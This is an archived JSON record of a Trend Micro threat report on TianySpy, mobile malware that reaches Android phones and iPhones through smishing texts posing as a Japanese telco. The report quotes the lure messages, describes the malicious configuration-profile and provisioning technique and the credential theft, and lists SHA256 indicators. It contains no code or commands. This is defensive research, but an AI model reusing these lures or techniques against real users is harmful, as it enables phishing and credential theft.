{
	"id": "639886e4-0b91-4dda-83a2-bde8bb84894d",
	"created_at": "2026-04-06T00:18:47.59516Z",
	"updated_at": "2026-04-10T13:12:52.704444Z",
	"deleted_at": null,
	"sha1_hash": "abd1873b40a2a6cc0d14fb2e5991959da318c7c7",
	"title": "TianySpy Malware Uses Smishing Disguised as Message From Telco",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 966863,
	"plain_text": "TianySpy Malware Uses Smishing Disguised as Message From\r\nTelco\r\nBy By: Trend Micro Jan 25, 2022 Read time: 4 min (1200 words)\r\nPublished: 2022-01-25 · Archived: 2026-04-02 10:43:35 UTC\r\nMobile\r\nTrend Micro confirmed a new mobile malware infection chain targeting both Android and iPhone devices. The\r\nmalware might have been designed to steal credentials associated with membership websites of major Japanese\r\ntelecommunication services.\r\nThis blog was first published here: https://blog.trendmicro.co.jp/archives/29322open on a new tab\r\nIt has been some time since SMS or text messaging has become a means to spread mobile malware. In September\r\n2021, Trend Micro confirmed a new mobile malware infection chain targeting both Android and iPhone devices.\r\nThe chain is triggered by a smishing message that appears to be sent from a telecommunications company. It is\r\nsurmised that the malware might have been designed to steal credentials associated with membership websites of\r\nmajor Japanese telecommunication services.\r\nThis is the first case confirmed by Trend Micro wherein an iPhone device was the target of a malware infection\r\ntriggered by smishing, as Android devices have always been the main target in all other cases. This is a\r\nnoteworthy cyberthreat, considering that the Japan Cybercrime Control Center (JC3)open on a new tab also\r\npublished a similar alertopen on a new tab.\r\nFigure 1. Examples of smishing message confirmed to be part of a TianySpy campaign\r\nInfection chain\r\nThis campaign was confirmed as active between September 30 and October 12, 2021. The smishing message,\r\nwhich was disguised as coming from a telecommunications company, contains a link to a malicious website. In\r\nturn, the website contains instructions to install what appears to be security software but is actually malware.\r\nTrend Micro confirmed two patterns of the message spread in this campaign:\r\nIn the first pattern, the SMS is sent from a malicious SMS delivery service:\r\n【●●●】お客様がご利用の●アカウントが不正利用の可能性があります。ご確認が必要です。\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 1 of 8\n\n(In English, this reads as follows: “Unauthorized access to your account detected. Please confirm.”)\r\nIn the second pattern, the SMS is potentially sent from devices infected by “AndroidOS_KeepSpy.GCL,”\r\nan Android malware:\r\n●●●お客様センターです。ご利用料金のお支払い確認が取れておりません。ご確認が必要です。\r\n(In English, this reads as follows: “Your payment could not be confirmed. Please confirm.”)\r\nIn the first pattern, TianySpy was confirmed to be infected in cases where users accessed the malicious link from\r\nboth Android and iPhone devices. In the second pattern, users of Android devices were lured into accessing the\r\nmalicious link, resulting in their devices being infected with KeepSpy. In the same pattern, users of iPhones who\r\naccessed the malicious link were infected with the version of TianySpy for their device.\r\nFigure 2. Malicious site accessed from an Android device\r\nFigure 3. Malicious site accessed from an iPhone device\r\nThe configuration profile in an iPhone is a function that can be used to define configuration for various functions\r\nof the device, including the Wi-Fi setting. In this campaign, users were lured into downloading and installing a\r\nmalicious configuration profile upon accessing a link in a smishing sms sent to their iPhone. Research from Trend\r\nMicro has confirmed that device information, such as the Unique Device Identifier (UDID), is sent to the\r\nattacker’s site when the malicious configuration profile is installed.\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 2 of 8\n\nThe sent UDID is then used in a provisioning profile, which has TianySpy built in. This enables TianySpy to\r\ninfect an iPhone through Ad Hoc distribution, which is usually used to deploy an application in its development\r\nstage. \r\nFigure 4. Example of a malicious configuration profile\r\nFigure 5. Example of data transmitted upon installation of configuration profile\r\nFigure 6. Example of malicious application (.ipa) and provisioning profile\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 3 of 8\n\nFigure 7. Contents of embedded mobile provision (UUID stolen from iPhone can be seen as\r\ninstallable device)\r\nMalware analysis\r\nFrom the results of our analysis of TianySpy (Android version), we determined that the malware has the following\r\nfunctions:\r\nReading Wi-Fi settings\r\nFalsifying a legitimate telecommunication company’s site, specifically its usage statement via WebView\r\n(via Application Web display system for Android)\r\nInformation stealing through a malicious JavaScript\r\nSending stolen data by mail\r\nDisplaying a malicious or fake site\r\nTianySpy first checks Wi-Fi settings and then displays an alert message inducing the user to turn off the Wi-Fi, if\r\nenabled. If the Wi-Fi is disabled, an authentication page (authentication is required prior to displaying the usage\r\nstatement page) is shown and credential information and authorized cookies are sent to the attacker’s email\r\naddress. During this process, the Wi-Fi is likely disabled, as the attacker wants to collect credentials over a carrier\r\nnetwork. \r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 4 of 8\n\nFigure 8. Decompiled codes from TianySpy Android version (left) and an alert message shown\r\nwhen Wi-Fi is enabled (right)\r\nFigure 9. Decompiled codes from TianySpy Android version (encrypted attacker’s email address)\r\nFigure 10. Decrypted attacker’s email address\r\nStop.html, which is enclosed in TianySpy, is displayed upon accessing a legitimate usage statement page.\r\nStop.html contains contents that make it seem that the site is under maintenance or security enhancement. We\r\nbelieve that the reason behind this is that the attacker wishes to hide the usage statement page.\r\nFigure 11. Stop.html enclosed in the resource of TianySpy Android version\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 5 of 8\n\nFigure 12. Contents of stop.html\r\nThe iPhone version of TianySpy shows many similarities with its Android version, such as holding encrypted\r\nstrings that contain the URL of the website’s usage statement, the attacker’s email address, and stop.html. Hence,\r\nthe iPhone version of TianySpy is highly likely to steal credentials and send them to the attacker.\r\nFigure 13. String values included in the iPhone version of TianySpy\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 6 of 8\n\nFigure 14. String values included in the iPhone version of TianySpy (encrypted email address)\r\nFigure 15. Decrypted email address; the same email address is seen in the Android version of\r\nTianySpy\r\nRelation with phishing group targeting local banks in Japan\r\nThe Cyber Security Instituteopen on a new tab at Trend Micro collaborated with JC3 and its members to research\r\nand analyze a phishing group targeting domestic banks in Japan. The resultsopen on a new tab of this\r\ncollaboration were reported in April 2021. Trend Micro also reported open on a new tabnotable characteristics of\r\nBP1 and BP6, the two largest banking phishing groups identified in the project.\r\nAs mentioned earlier, some text messages seen in this campaign contained links to lure users into installing\r\nsecurity software. In reality, however, users would end up unknowingly infecting their device with the Android\r\nmalware KeepSpy. It has also been confirmed that when accessed via an iPhone outside of the observed campaign\r\nperiod (September 30 to October 12, 2021), these phishing sites appear as websites for a telecommunication\r\ncompany and are categorized under the BP1 group.\r\nFigure 16. HTML source of a phishing site disguised as the website of a telecommunication\r\ncompany\r\nFigure 17. HTML source of a phishing site disguised as the website of a telecommunication\r\ncompany\r\nHow to protect yourself from phishing\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 7 of 8\n\nThis is the first case in Japan where a type of malware that targets iPhones resulted in financial damage.\r\nThis campaign shows that iPhones can indeed be infected by malware once a malicious configuration profile is\r\ninstalled. This case also confirmed that simply accessing a malicious website would not inevitably infect a device\r\nwith malware. Rather, a user has to complete the process of installing the malware for infection to take place. This\r\nmeans that with enough knowledge and caution, a user can protect their device from infection.\r\nWe also believe that smishing continues to be part of this loop of attack chains targeting smartphones. In the\r\nmeantime, JC3 continues to publish alert notificationsopen on a new tab with regard to the same campaign\r\ndetailed in this blog for additional reference.\r\nMore details on smishing and how to protect yourself from such threats can be found in this blogopen on a new\r\ntab.\r\nIndicators of compromise\r\nSHA256 Trend Micro Detection\r\nb42bdfceb8e7733db22645fee95482dccf5260dcd3ff15ede0de77d2120c3845\r\nAndroidOS_TianySpy.GCL\r\na16878598e0ce5924fa45c09319b48e566f4d935626042ba378f4f1f7b9ad798\r\n5d27cc2e0a8ab987341e8995bf50cc763160cce4191df9a94c4b39b570c0d6a5\r\n73c19a778500c6fb04f60d60527ea76a870590ed9e0f6014cb03419d02ff0457\r\nada8dfe4914f824e5a4a03aec8f135a4544cc0086830f23285dc67d42ec1f29c\r\n839246c1b13d2d9c87907bdd4069ce0aad02e5660cb10fad4a85805e4b81dcea\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nhttps://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html"
	],
	"report_names": [
		"tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434727,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/abd1873b40a2a6cc0d14fb2e5991959da318c7c7.pdf",
		"text": "https://archive.orkl.eu/abd1873b40a2a6cc0d14fb2e5991959da318c7c7.txt",
		"img": "https://archive.orkl.eu/abd1873b40a2a6cc0d14fb2e5991959da318c7c7.jpg"
	}
}